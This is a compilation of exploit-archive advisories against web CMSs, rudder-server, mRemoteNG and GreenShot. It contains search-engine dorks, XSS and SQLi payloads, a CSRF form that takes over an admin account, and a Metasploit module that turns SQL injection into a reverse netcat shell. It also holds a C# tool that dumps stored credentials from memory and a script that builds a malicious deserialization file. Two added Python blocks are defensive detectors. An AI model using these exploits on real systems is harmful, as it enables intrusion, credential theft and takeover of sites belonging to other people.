<pre><code>====================================================================================================================================<br />| # Title : Codoforum v3.4 Arbitrary file upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : https://codoforum.com/ |<br />| # Dork : "Powered by Codoforum" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Suffers from an arbitrary file upload vulnerability.<br /><br />[+] Register a new member.<br /><br />[+] Go to edit your profile: http://127.0.0.1/qspa.co.uk/index.php?u=/user/profile/6/edit<br /><br /><br />Greetings to :<br />=======================================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMSsite v1.0 privilege escalation Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0.1 (32-bit) |<br />| # Vendor : https://github.com/VictorAlagwu/CMSsite/archive/master.zip |<br />| # Dork : n/a |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] First register a new member.<br /><br />[+] After logging in to your account you are automatically redirected to the admin panel.<br /><br />[+] Go to edit your profile http://127.0.0.1/CMSsite-master/admin/profile.php?section=indoushka & upload your Ev!l files<br /><br />[+] et voila http://127.0.0.1/CMSsite-master/img/csc.php<br /><br />Greetings to :<br />=======================================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMSUsina V2.2.3 CSRF Add Admin Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : http://www.ysy.com.br/ |<br />| # Dork : "Desenvolvido por Usina da Criação" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] The following HTML code edits the admin account.<br /><br />[+] Go to line 3.<br /><br />[+] Set the target site link, save changes and apply.<br /><br />[+] infected file : site/adm/user.php.<br /><br />[+] http://127.0.0.1/site/adm/user.php<br /><br />[+] save code as poc.html .<br /><br /><p>Alterar seus dados de acesso</p><br /><fieldset><legend>ALTERAR DADOS</legend><br /><form name="editsenha" method="post" action="http://rcborgesconstrutoracombr/site/adm/user.php?acao=edit"><br /><label><b>Usu&aacute;rio</b></label><br /><input type="text" name="login" value="." maxlength="14" size="70" /><br /><label><b>Confirmar usu&aacute;rio</b></label><br /><input type="text" name="login2" value="." maxlength="14" size="70" /><br /><label><b>Senha</b></label><br /><input type="password" name="senha" value="." maxlength="14" size="70" /><br /><label><b>Confirmar senha</b></label><br /><input type="password" name="senha2" value="." maxlength="14" size="70" /><br /><input type="submit" name="submit" value="Alterar senha" /><br /></form><br /></fieldset><br /><!-- fim conteúdo --><br /><br />Greetings to :<br />===============================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br />  Rank = ExcellentRanking<br />  include Msf::Exploit::FileDropper<br />  include Msf::Exploit::Remote::HttpClient<br />  prepend Msf::Exploit::Remote::AutoCheck<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Rudder Server SQLI Remote Code Execution',<br />        'Description' => %q{<br />          This Metasploit module exploits a SQL injection vulnerability in<br />          RudderStack's rudder-server, an open source Customer Data Platform (CDP).<br />          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.<br />          By exploiting this flaw, an attacker can execute arbitrary SQL commands,<br />          which may lead to Remote Code Execution (RCE) due to the `rudder` role<br />          in PostgreSQL having superuser permissions by default.<br />        },<br />        'License' => MSF_LICENSE,<br />        'Author' => [<br />          'Ege Balcı <egebalci@pm.me>' # msf module<br />        ],<br />        'References' => [<br />          ['CVE', '2023-30625'],<br />          ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'],<br />          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'],<br />        ],<br />        'DefaultOptions' => {<br />          'SSL' => false,<br />          'WfsDelay' => 5<br />        },<br />        'Platform' => [ 'unix', 'linux' ],<br />        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],<br />        'Targets' => [<br />          [<br />            'Unix Command',<br />            {<br />              'Platform' => %w[unix linux],<br />              'Arch' => ARCH_CMD,<br />              'Type' => :unix_cmd,<br />              'DefaultOptions' => {<br />                'PAYLOAD' => 'cmd/unix/reverse_netcat'<br />              }<br />            }<br />          ],<br />          # Due to the insufficient build instructions for Windows platforms, no testing was done on this platform.<br />          # As a result, the target is disabled in this exploit module.<br />          # [<br />          #   'Windows Command',<br />          #   {<br />          #     'Platform' => 'win',<br />          #     'Arch' => ARCH_CMD,<br />          #     'Type' => :win_cmd,<br />          #     'DefaultOptions' => {<br />          #       'PAYLOAD' => 'cmd/windows/powershell_reverse_netcat'<br />          #     }<br />          #   }<br />          # ],<br />        ],<br />        'DefaultTarget' => 0,<br />        'Privileged' => false,<br />        'DisclosureDate' => '2023-06-16',<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]<br />        }<br />      )<br />    )<br /><br />    register_options(<br />      [<br />        Opt::RPORT(8080),<br />        OptString.new('TARGETURI', [true, 'The URI of the Rudder API', '/']),<br />      ]<br />    )<br />  end<br /><br />  def check<br />    version = get_version<br />    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'<br /><br />    if Rex::Version.new('1.3.0-rc.1') > Rex::Version.new(version.gsub('v', ''))<br />      return Exploit::CheckCode::Appears("Rudder Version: #{version}")<br />    end<br /><br />    Exploit::CheckCode::Safe<br />  end<br /><br />  def get_version<br />    return @get_version if @get_version<br /><br />    res = send_request_cgi(<br />      'method' => 'GET',<br />      'uri' => normalize_uri(target_uri.path, 'version')<br />    )<br />    if res && res.code == 200<br />      @get_version = res.get_json_document['Version']<br />      # A response without a Version field must not raise on nil<br />      if @get_version.nil? || @get_version.empty?<br />        @get_version = 'Unknown'<br />      end<br /><br />      @get_version<br />    end<br />  end<br /><br />  def exploit<br />    print_status "Detected rudder version: #{get_version}"<br />    # Pick the shell used by COPY ... TO PROGRAM for the selected target<br />    case target['Type']<br />    # when :win_cmd<br />    #   shell = 'cmd.exe'<br />    when :unix_cmd<br />      shell = 'bash'<br />    else<br />      fail_with(Failure::BadConfig, 'Please select a valid target')<br />    end<br /><br />    data = "{\"source_id\": \"#{Rex::Text.rand_text_alpha(4..8)}'; copy (SELECT '#{payload.encoded}') to program '#{shell}'-- - \"}"<br />    print_status 'Triggering RCE via crafted SQL query...'<br />    send_request_cgi({<br />      'method' => 'POST',<br />      'uri' => normalize_uri(target_uri.path, '/v1/warehouse/pending-events'),<br />      'ctype' => 'application/json',<br />      'data' => data<br />    })<br />  end<br />end<br /></code></pre>
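As an added example (not part of the Metasploit module above or of rudder-server), the defender's side of the request shape the module sends: an allowlist check for the `source_id` field, which is the kind of validation the service should apply before the value reaches SQL, and a scan over constructed log lines for POSTs to /v1/warehouse/pending-events that break the allowlist or carry the COPY ... TO PROGRAM pattern. The identifier format and the log line layout are assumptions; the real remedy is upgrading to rudder-server 1.3.0-rc.1 or later and not running the `rudder` PostgreSQL role as superuser.

```python
import json
import re

# Assumption (not stated in the advisory): RudderStack source IDs are short opaque
# identifiers, so anything outside this character set has no business reaching SQL.
SOURCE_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Shape of the module's payload: a quote to leave the string literal, then
# PostgreSQL COPY ... TO PROGRAM, which runs a shell command on the database host.
INJECTION_MARKERS = (
    re.compile(r"'"),
    re.compile(r"\bcopy\b.*\bto\s+program\b", re.IGNORECASE | re.DOTALL),
)


def is_valid_source_id(value) -> bool:
    """Allowlist check a service should apply before the value is used in a query."""
    return isinstance(value, str) and SOURCE_ID_RE.fullmatch(value) is not None


def classify_body(body: str) -> str:
    """Return 'ok', 'invalid' or 'injection' for one pending-events request body."""
    try:
        doc = json.loads(body)
    except ValueError:
        return "invalid"
    sid = doc.get("source_id") if isinstance(doc, dict) else None
    if is_valid_source_id(sid):
        return "ok"
    if isinstance(sid, str) and all(m.search(sid) for m in INJECTION_MARKERS):
        return "injection"
    return "invalid"


def scan_request_log(lines) -> list:
    """Flag bad pending-events calls in log lines of the assumed form
    '<client ip> <method> <path> <request body>'."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue
        client, method, path, body = parts
        if method != "POST" or not path.endswith("/v1/warehouse/pending-events"):
            continue
        verdict = classify_body(body)
        if verdict != "ok":
            hits.append((client, verdict))
    return hits


# Constructed sample log lines (not real traffic). The third line has the shape of
# the module's request with a harmless command in place of a payload.
SAMPLE_LOG = [
    '10.0.0.5 POST /v1/warehouse/pending-events {"source_id": "2Ab3cD4eF5gH"}',
    "10.0.0.9 GET /version -",
    "203.0.113.7 POST /v1/warehouse/pending-events "
    + json.dumps({"source_id": "xyz'; copy (SELECT 'true') to program 'bash'-- - "}),
    '203.0.113.8 POST /v1/warehouse/pending-events {"source_id": 42}',
]

if __name__ == "__main__":
    for client, verdict in scan_request_log(SAMPLE_LOG):
        print(f"{client}: {verdict}")
```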
<pre><code># Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 29/07/2023<br /># Vendor: The Thinkery LLC<br /># Vendor Homepage: http://thethinkery.net<br /># Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/<br /># Demo: https://iproperty.thethinkery.net/<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />The attacker can send the victim a link containing a malicious URL in an email or instant message<br />and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /iproperty/property-views/all-properties-with-map<br /><br />GET parameter 'filter_keyword' is vulnerable to XSS<br /><br />https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1<br /><br /><br />XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>========================================================================================================<br />| # Title : Codecanyon Bitcoin Tools Suite v1.0 LFI Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) |<br />| # Vendor : http://nitrogfx.com/74316-codecanyon-bitcoin-tools-suite-v10-50-features-20003097.html |<br />| # Dork : "Powerful bitcoin and cryptocurrency tools & tickers." |<br />========================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] infected file : index.php<br /><br />    line 4 : require_once('includes/templates/' . $website['template'] . '/header.php');<br /><br />[+] http://localhost/btcon/index.php?website['template'] = evil<br /><br /><br />Greetings to :<br />=======================================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : CMVC SHOP LMS v 2.1.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit) |<br />| # Vendor : http://www.cmvcshop.com/ |<br />| # Dork : All rights reserved CMVC SHOP |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use Payload : product_detail.php?productid=%Inject_Here%106<br /><br />[+] http://127.0.0.1/cmvcshopcom/product_detail.php?productid=%Inject_Here%106<br /><br />[+] http://127.0.0.1/wwwcmvcshopcom/login.php<br /><br />Greetings to :<br />=======================================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory<br /># Google Dork: -<br /># Date: 21.07.2023<br /># Exploit Author: Maximilian Barz<br /># Vendor Homepage: https://mremoteng.org/<br /># Software Link: https://mremoteng.org/download<br /># Version: mRemoteNG <= v1.77.3.1784-NB<br /># Tested on: Windows 11<br /># CVE : CVE-2023-30367<br /><br />/*<br />Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to<br />store and manage multi-protocol connection configurations to remotely connect to systems.<br /><br />mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev<br />loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,<br />even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text<br />through a memory dump and thus compromise user credentials when no custom password encryption key has been set.<br />This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.<br />Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper<br />*/<br /><br />using System;<br />using System.Collections;<br />using System.Collections.Generic;<br />using System.Diagnostics;<br />using System.IO;<br />using System.Reflection;<br />using System.Runtime.InteropServices;<br />using System.Text;<br />using System.Text.RegularExpressions;<br /><br />namespace mRemoteNGDumper<br />{<br />    public static class Program<br />    {<br />        public enum MINIDUMP_TYPE<br />        {<br />            MiniDumpWithFullMemory = 0x00000002<br />        }<br /><br />        [StructLayout(LayoutKind.Sequential, Pack = 4)]<br />        public struct MINIDUMP_EXCEPTION_INFORMATION<br />        {<br />            public uint ThreadId;<br />            public IntPtr ExceptionPointers;<br />            public int ClientPointers;<br />        }<br /><br />        [DllImport("kernel32.dll")]<br />        static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);<br /><br />        [DllImport("Dbghelp.dll")]<br />        static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);<br /><br />        static void Main(string[] args)<br />        {<br />            string input;<br />            bool configfound = false;<br />            List<string> configs = new List<string>();<br /><br />            Process[] localByName = Process.GetProcessesByName("mRemoteNG");<br /><br />            if (localByName.Length == 0)<br />            {<br />                Console.WriteLine("[-] No mRemoteNG process was found. Exiting");<br />                System.Environment.Exit(1);<br />            }<br />            string assemblyPath = Assembly.GetEntryAssembly().Location;<br />            Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);<br />            string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";<br />            FileStream procdumpFileStream = File.Create(dumpFileName);<br />            MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();<br /><br />            // A full memory dump is necessary in the case of a managed application, otherwise no information<br />            // regarding the managed code will be available<br />            MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;<br />            MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);<br />            procdumpFileStream.Close();<br /><br />            Console.WriteLine("[+] Searching for configuration files in memory dump.");<br />            using (StreamReader reader = new StreamReader(dumpFileName))<br />            {<br />                while (reader.Peek() >= 0)<br />                {<br />                    input = reader.ReadLine();<br />                    // Connection entries are serialized as self-closing &lt;Node .../&gt; XML elements<br />                    string pattern = @"(\<Node)(.*)(?=\/>)\/>";<br />                    Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);<br />                    if (m.Success)<br />                    {<br />                        configfound = true;<br /><br />                        foreach (string config in m.Value.Split('>'))<br />                        {<br />                            configs.Add(config);<br />                        }<br />                    }<br />                }<br /><br />                reader.Close();<br />                if (configfound)<br />                {<br />                    string currentDir = System.IO.Directory.GetCurrentDirectory();<br />                    string dumpdir = currentDir + "/dump";<br />                    if (!Directory.Exists(dumpdir))<br />                    {<br />                        Directory.CreateDirectory(dumpdir);<br />                    }<br /><br />                    string savefilepath;<br />                    for (int i = 0; i < configs.Count; i++)<br />                    {<br />                        if (!string.IsNullOrEmpty(configs[i]))<br />                        {<br />                            savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";<br />                            Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);<br />                            using (StreamWriter writer = new StreamWriter(savefilepath))<br />                            {<br />                                writer.Write(configs[i] + '>');<br />                                writer.Close();<br />                            }<br />                        }<br />                    }<br />                    Console.WriteLine("[+] Done!");<br />                    Console.WriteLine("[+] Deleting memorydump file!");<br />                    File.Delete(dumpFileName);<br />                    Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \"" + currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"");<br />                }<br />                else<br />                {<br />                    Console.WriteLine("[-] No configuration file found in memorydump. Exiting");<br />                    Console.WriteLine("[+] Deleting memorydump file!");<br />                    File.Delete(dumpFileName);<br />                }<br />            }<br />        }<br />    }<br />}<br /></code></pre>
<pre><code># Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution<br /># Date: 26/07/2023<br /># Exploit Author: p4r4bellum<br /># Vendor Homepage: https://getgreenshot.org<br /># Software Link: https://getgreenshot.org/downloads/<br /># Version: 1.2.6.10<br /># Tested on: windows 10.0.19045 N/A build 19045<br /># CVE : CVE-2023-34634<br />#<br /># GreenShot 1.2.10 and below is vulnerable to insecure object deserialization in its custom *.greenshot format.<br /># A stream of .NET objects is serialized and insecurely deserialized when a *.greenshot file is opened with the software.<br /># On a default install the *.greenshot file extension is associated with the program, so double-clicking a *.greenshot file<br /># will lead to arbitrary code execution.<br />#<br /># Generate the payload. You need ysoserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net<br />./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw<br /># load the payload<br />$payload = Get-Content .\payload.bin -Encoding Byte<br /># retrieve the length of the payload<br />$length = $payload.Length<br /># load the required assembly to craft a PNG file<br />Add-Type -AssemblyName System.Drawing<br /># the following lines create a PNG file with some text.<br /># Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell<br />$filename = "$home\poc.greenshot"<br />$bmp = new-object System.Drawing.Bitmap 250,61<br />$font = new-object System.Drawing.Font Consolas,24<br />$brushBg = [System.Drawing.Brushes]::Green<br />$brushFg = [System.Drawing.Brushes]::Black<br />$graphics = [System.Drawing.Graphics]::FromImage($bmp)<br />$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)<br />$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10)<br />$graphics.Dispose()<br />$bmp.Save($filename)<br /><br /># append the payload to the PNG file<br />$payload | Add-Content -Path $filename -Encoding Byte -NoNewline<br /># append the length of the payload as an 8-byte little-endian integer<br />[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline<br /># append the signature<br />"Greenshot01.02" | Add-Content -Path $filename -NoNewline -Encoding Ascii<br /># launch greenshot. Calc.exe should be executed<br />Invoke-Item $filename<br /></code></pre>
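As an added example (not the advisory's script and not Greenshot's own parser), a Python triage routine for the file layout the script above builds: PNG bytes, the serialized .NET blob, an 8-byte little-endian length, then the "Greenshot01.02" signature. It splits the file, reports a BinaryFormatter stream (normal for the format, but exactly what Greenshot 1.2.10 and below deserializes on open) and raises an alert when the WindowsIdentity gadget type from the advisory appears in the blob; the sample builder with its fake PNG is constructed for the test.

```python
import struct

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
GREENSHOT_SIG = b"Greenshot01.02"  # trailer signature the advisory appends last
# Leading bytes of a .NET BinaryFormatter stream: SerializationHeaderRecord with
# record type 0, RootId 1 and HeaderId -1 (the usual values).
NRBF_HEADER = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff"
# Gadget type used by the advisory's ysoserial.net payload; a drawing has no use for it.
SUSPICIOUS_TYPES = (b"System.Security.Principal.WindowsIdentity",)


def parse_greenshot(data: bytes) -> dict:
    """Split a .greenshot file into its parts as laid out in the advisory:
    <PNG bytes><serialized .NET objects><int64 little-endian blob length><signature>.
    'error' is set when the trailer is missing or the length field is inconsistent."""
    info = {"is_png": data.startswith(PNG_MAGIC), "blob": b"", "png_len": 0, "error": None}
    if not data.endswith(GREENSHOT_SIG):
        info["error"] = "no Greenshot trailer signature"
        return info
    body = data[: -len(GREENSHOT_SIG)]
    if len(body) < 8:
        info["error"] = "file too short for the length field"
        return info
    (blob_len,) = struct.unpack("<q", body[-8:])
    body = body[:-8]
    if blob_len < 0 or blob_len > len(body):
        info["error"] = f"length field {blob_len} does not fit the file"
        return info
    info["png_len"] = len(body) - blob_len
    info["blob"] = body[info["png_len"]:]
    return info


def assess_greenshot(data: bytes) -> list:
    """Triage a .greenshot file before it is opened; returns (level, message) findings."""
    findings = []
    info = parse_greenshot(data)
    if info["error"]:
        return [("error", info["error"])]
    if not info["is_png"]:
        findings.append(("alert", "leading bytes are not a PNG image"))
    blob = info["blob"]
    if blob.startswith(NRBF_HEADER):
        # Expected for the format, but this is the stream fed to BinaryFormatter.
        findings.append(("info", f"BinaryFormatter stream of {len(blob)} bytes will be deserialized"))
    for name in SUSPICIOUS_TYPES:
        if name in blob:
            findings.append(("alert", f"serialized type {name.decode()} referenced in blob"))
    return findings


def build_sample(blob: bytes) -> bytes:
    """Constructed test input: PNG magic (not a decodable image) plus the advisory's trailer."""
    return PNG_MAGIC + b"\x00" * 16 + blob + struct.pack("<q", len(blob)) + GREENSHOT_SIG
```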
<pre><code>====================================================================================================================================<br />| # Title : CMSshop(ir) v1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169 |<br />| # Dork : "Login - ProLogin" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engine.<br /><br />[+] Use payload : /shop-php/cart.php?new=28%22%20onmouseover%3dprompt(904251)%20bad%3d%22<br />                  /shop-php/product.php?productid=20&start=0%22%20onmouseover%3dprompt(961299)%20bad%3d%22<br /><br />[+] http://localhost/shop-php/cart.php?new=21%22%20%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22<br /><br />Greetings to :<br />===============================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>